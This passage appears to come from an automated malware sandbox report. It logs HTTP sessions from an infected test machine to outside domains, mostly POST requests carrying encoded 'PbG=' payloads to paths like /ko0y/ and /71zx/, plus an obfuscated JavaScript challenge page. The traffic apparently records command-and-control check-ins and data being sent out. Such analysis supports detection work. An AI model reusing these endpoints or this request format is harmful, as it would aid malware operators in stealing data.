                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 2e 20 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 30 22 3e 3c 73 74 79 6c 65 3e 64 69 76 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6c 6f 61 64 65 72 7b 6d 61 72 67 69 6e 3a 61 75 74 6f [TRUNCATED]
                                                                                                                                                    Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
                                                                                                                                                    Oct 4, 2024 12:03:14.253393888 CEST1289INData Raw: 23 30 30 30 30 20 31 30 25 2c 23 30 30 30 29 2c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 23 30 30 30 20 30 20 30 29 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 3a 76 61 72 28 2d 2d 5f 6d 29 3b 6d 61 73 6b 3a
                                                                                                                                                    Data Ascii: #0000 10%,#000),linear-gradient(#000 0 0) content-box;-webkit-mask:var(--_m);mask:var(--_m);-webkit-mask-composite:source-out;mask-composite:subtract;animation:l3 1s infinite linear}@keyframes l3{to{transform:rotate(1turn)}}</style></head><bod
                                                                                                                                                    Oct 4, 2024 12:03:14.253732920 CEST1289INData Raw: 6e 63 61 74 27 2c 27 74 72 61 63 65 27 2c 27 7b 7d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 5c 78 32 32 72 65 74 75 72 6e 5c 78 32 30 74 68 69 73 5c 78 32 32 29 28 5c 78 32 30 29 27 2c 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2c 27 77 61 72 6e 27
                                                                                                                                                    Data Ascii: ncat','trace','{}.constructor(\x22return\x20this\x22)(\x20)','Content-Type','warn','1184299iAoMQM','send','info','apply','application/x-www-form-urlencoded','6689656NjkqqV','28DGQdGS','search','toString','9RrPAbC','(((.+)+)+)+$','__proto__','5
                                                                                                                                                    Oct 4, 2024 12:03:14.253771067 CEST1289INData Raw: 6c 2b 2b 29 7b 76 61 72 20 6d 3d 63 5b 61 33 28 30 78 65 34 2c 30 78 65 65 29 5d 5b 61 33 28 30 78 63 62 2c 30 78 64 31 29 5d 5b 61 33 28 30 78 63 38 2c 30 78 62 66 29 5d 28 63 29 2c 6e 3d 6b 5b 6c 5d 2c 6f 3d 6a 5b 6e 5d 7c 7c 6d 3b 6d 5b 61 33
                                                                                                                                                    Data Ascii: l++){var m=c[a3(0xe4,0xee)][a3(0xcb,0xd1)][a3(0xc8,0xbf)](c),n=k[l],o=j[n]||m;m[a3(0xdf,0xd8)]=c[a3(0xc8,0xba)](c),m[a3(0xdc,0xca)]=o['toString'][a3(0xc8,0xc2)](o),j[n]=m;}});b();var bbc6cf0=function a(z){function A(X,Y){return X>>>Y|X<<0x20-Y
                                                                                                                                                    Oct 4, 2024 12:03:14.253911018 CEST491INData Raw: 34 65 35 64 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 69 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 69 2c 68 29 29 3b 7d 28 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 66 32 38 62 34 65 35 64 28 30 78 62 62 38 29 3b
                                                                                                                                                    Data Ascii: 4e5d(h){return new Promise(i=>setTimeout(i,h));}((async()=>{await f28b4e5d(0xbb8);function a5(h,i){return g(i- -0x18d,h);}const h=await bbc6cf0(cjs);xhr=new XMLHttpRequest(),xhr['open'](a5(-0x8c,-0x9d),jsChallengeUrl),xhr[a5(-0xb8,-0xc2)](a5(-


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    77192.168.11.2049809162.255.119.15080
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:19.382311106 CEST702OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 71 5a 68 7a 39 63 6c 2f 55 38 6a 49 4c 4f 53 54 63 34 73 38 39 67 6c 53 52 6c 65 63 38 6f 31 43 77 7a 4d 7a 61 4b 62 41 65 41 74 79 4b 55 47 58 78 62 63 76 69 54 37 43 51 68 33 69 65 32 4f 52 75 58 38 61 66 37 35 6f 6f 38 46 68 6f 4d 36 45 6e 53 70 78 31 31 37 58 68 34 46 39 31 6c 46 58 6b 75 2f 63 43 4e 66 64 30 52 74 35 41 70 4c 48 76 38 45 4c 6a 56 52 4e 71 36 6a 6f 4c 4b 2f 4d 61 45 44 6e 58 54 30 6b 65 4f 32 64 66 6f 57 61 4c 56 63 5a 77 67 45 4c 44 71 6a 30 73 38 51 43 6f 45 4b 42 46 63 70 44 31 70 6e 79 45 41 73 4b 36 68 32 41 71 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFqZhz9cl/U8jILOSTc4s89glSRlec8o1CwzMzaKbAeAtyKUGXxbcviT7CQh3ie2ORuX8af75oo8FhoM6EnSpx117Xh4F91lFXku/cCNfd0Rt5ApLHv8ELjVRNq6joLK/MaEDnXT0keO2dfoWaLVcZwgELDqj0s8QCoEKBFcpD1pnyEAsK6h2AqQ==
                                                                                                                                                    Oct 4, 2024 12:03:19.496412992 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:19 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    78192.168.11.2049810162.255.119.15080
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:22.022593021 CEST722OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 6f 36 35 7a 37 37 4a 2f 53 63 6a 4a 56 65 53 54 56 59 73 77 39 67 70 53 52 6b 4b 4d 38 61 52 43 31 6a 38 7a 4c 2f 33 41 5a 41 74 79 43 30 47 59 31 62 63 30 69 54 33 4b 51 67 4c 69 65 31 79 52 75 56 6b 61 63 49 52 72 6f 73 46 6a 67 73 36 47 70 79 70 78 31 31 37 58 68 34 52 62 31 6c 39 58 6b 65 76 63 44 70 72 65 39 78 74 36 48 70 4c 48 6c 63 45 50 6a 56 52 37 71 2b 6a 47 4c 49 33 4d 61 42 2f 6e 47 69 30 72 55 4f 32 54 52 49 58 78 4b 57 6c 4c 35 43 34 74 47 72 66 74 6f 70 56 38 67 79 62 62 59 75 64 6e 32 36 37 41 41 77 56 69 34 6a 33 62 33 64 39 31 67 43 34 2f 42 72 77 51 50 48 4c 49 68 45 6b 4d 59 52 41 3d
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aRC1j8zL/3AZAtyC0GY1bc0iT3KQgLie1yRuVkacIRrosFjgs6Gpypx117Xh4Rb1l9XkevcDpre9xt6HpLHlcEPjVR7q+jGLI3MaB/nGi0rUO2TRIXxKWlL5C4tGrftopV8gybbYudn267AAwVi4j3b3d91gC4/BrwQPHLIhEkMYRA=
                                                                                                                                                    Oct 4, 2024 12:03:22.136637926 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:22 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    79192.168.11.2049811162.255.119.15080
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:24.663294077 CEST2578OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 6f 36 35 7a 37 37 4a 2f 53 63 6a 4a 56 65 53 54 56 59 73 77 39 67 70 53 52 6b 4b 4d 38 61 5a 43 31 77 30 7a 61 6f 6a 41 59 41 74 79 49 55 48 66 31 62 64 75 69 54 2f 77 51 67 48 79 65 7a 32 52 76 32 73 61 64 35 52 72 6e 73 46 6a 73 4d 36 46 6e 53 70 65 31 31 72 54 68 34 42 62 31 6c 39 58 6b 59 44 63 46 39 66 65 2f 78 74 35 41 70 4c 62 76 38 45 72 6a 56 35 72 71 2b 6e 34 4b 35 58 4d 55 42 50 6e 45 30 67 72 63 4f 32 52 51 34 58 70 4b 58 59 56 35 43 6b 70 47 6f 44 54 6f 75 68 38 6b 48 65 57 49 39 4e 51 79 39 43 4d 64 43 46 39 37 51 72 7a 30 2f 4e 4f 6b 6a 6b 4a 50 4c 77 77 45 6d 66 61 34 57 59 78 45 6e 35 49 59 69 4f 67 73 76 49 79 44 4a 65 69 4d 32 46 38 54 65 69 30 71 39 53 67 64 69 32 58 6e 66 32 7a 54 6b 4c 56 5a 4f 33 50 41 44 38 63 36 7a 54 74 42 58 36 59 69 59 69 72 70 7a 58 66 77 37 68 58 6b 54 79 39 34 75 56 73 4b 76 72 70 71 59 65 2f 72 4e 55 65 38 4f 2f 64 65 79 69 45 73 72 77 4d 6b 4f 54 33 39 53 32 4b 45 36 4f 49 36 30 49 44 45 50 44 53 68 66 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aZC1w0zaojAYAtyIUHf1bduiT/wQgHyez2Rv2sad5RrnsFjsM6FnSpe11rTh4Bb1l9XkYDcF9fe/xt5ApLbv8ErjV5rq+n4K5XMUBPnE0grcO2RQ4XpKXYV5CkpGoDTouh8kHeWI9NQy9CMdCF97Qrz0/NOkjkJPLwwEmfa4WYxEn5IYiOgsvIyDJeiM2F8Tei0q9Sgdi2Xnf2zTkLVZO3PAD8c6zTtBX6YiYirpzXfw7hXkTy94uVsKvrpqYe/rNUe8O/deyiEsrwMkOT39S2KE6OI60IDEPDShfmikE74Y9PPH2UdqYBcdQD7Jf5uM8nEK60/Wy4NYdj8mbCnMrxIH3pr13QV2+pzEU8U5LuSzueCVlO0ss2EnpnZxnWqZmhAKYv1BsO5gF1hx7Jrm0GI/qad9nMfxmaxdZze1gsP4u9NdhkhifFf+KOG8rOIycYCXlv895FrKv5VSLERrzC4T3qE+ZT3vpoGm8+7KfkuktI7VHD8GdaxmwLNV32u5MKwPDj7zjLz1GBcSpiQ7Iz1z9nybTNdiWc3GWChsoJHgOwemxhlGKsjsIpz9jcJY80M5IWkJwpWNNm7/9x+BaRqvTFdIDm+6uWsyZywImIkNziXbWUYug9rzluALemPvJEcovXH0vEE+3I7BIMuttVXHiYis6TsMwXTlcLXIY5Sojyq5GJgxTUUzgmyW47d4hFL5KFDev9Gt9K3OrbchbXH7mquSF/W5Lb0WChrS3Yiyo3sdUfMIEN2o9cjjJoFSwf+iUM49fvE76TTxM1Dki15I6OBL/YsgF6LFHmFiS4KLLNhkUwRlN0U8WEl3bCXt8drkyXhvk+I44gF8dkaSAoAKRq/wJmlzC8qIu/dk6UCirMDTuzo74VfRL1pVwsKSrpvebna3L4ZGT96asWYi44J731b7q80O9gdUZfmMRiqIMTpdzvXbfO4nPYPFI41NsimEjz+ [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:03:24.663364887 CEST4349OUTData Raw: 6b 39 71 69 41 63 34 49 78 49 77 6b 36 76 6e 51 62 70 54 4a 4a 49 58 62 57 66 42 61 68 42 4a 30 73 47 64 4e 31 54 38 65 6b 63 4a 52 64 69 30 52 31 56 70 6c 44 33 6f 54 67 73 4c 56 4a 66 58 30 2f 73 78 6b 36 76 71 6a 33 32 4b 4d 39 31 67 68 32 38
                                                                                                                                                    Data Ascii: k9qiAc4IxIwk6vnQbpTJJIXbWfBahBJ0sGdN1T8ekcJRdi0R1VplD3oTgsLVJfX0/sxk6vqj32KM91gh28VaFDfwgayxjQABCQD2xPPun8qBvL79dZKZwDKcQvo8ZLFody7711sasI2Nx90NuI1+0RSOndpP9/8WC2uzEz25eQi4ylGzN8+nXOaMh38Q6NAQcHPJWutylS+3v7TIzw00KqFBRtRaELxsA+YhM+KNrjXNL0v/r51
                                                                                                                                                    Oct 4, 2024 12:03:24.778285027 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    80192.168.11.2049812162.255.119.15080
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:27.302198887 CEST432OUTGET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:03:27.416059017 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    81192.168.11.204981391.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:49.085659981 CEST681OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 73 77 4d 31 48 47 45 74 66 72 57 64 43 2b 6f 5a 39 2b 36 4d 37 58 30 70 4a 71 55 6b 62 6d 71 6b 32 53 72 47 77 51 43 44 46 4b 79 44 66 77 35 30 32 5a 68 36 6d 52 31 2f 47 47 59 52 41 49 64 2f 55 61 61 6b 71 4a 55 76 49 53 4b 51 4d 79 70 52 47 2f 2f 6d 48 38 2f 6c 77 58 6f 54 38 73 2b 6b 74 48 78 2b 49 4f 44 67 72 4d 72 50 37 36 76 75 61 68 54 4a 36 41 30 61 66 2f 6c 32 45 4f 57 5a 48 32 74 5a 6d 5a 4d 6b 56 36 35 53 6c 52 4a 53 77 70 62 4f 42 4a 54 64 55 57 57 6e 4d 48 38 36 4b 38 42 65 4d 61 42 52 61 6b 33 5a 71 76 63 52 43 46 42 42 4c 41 3d 3d
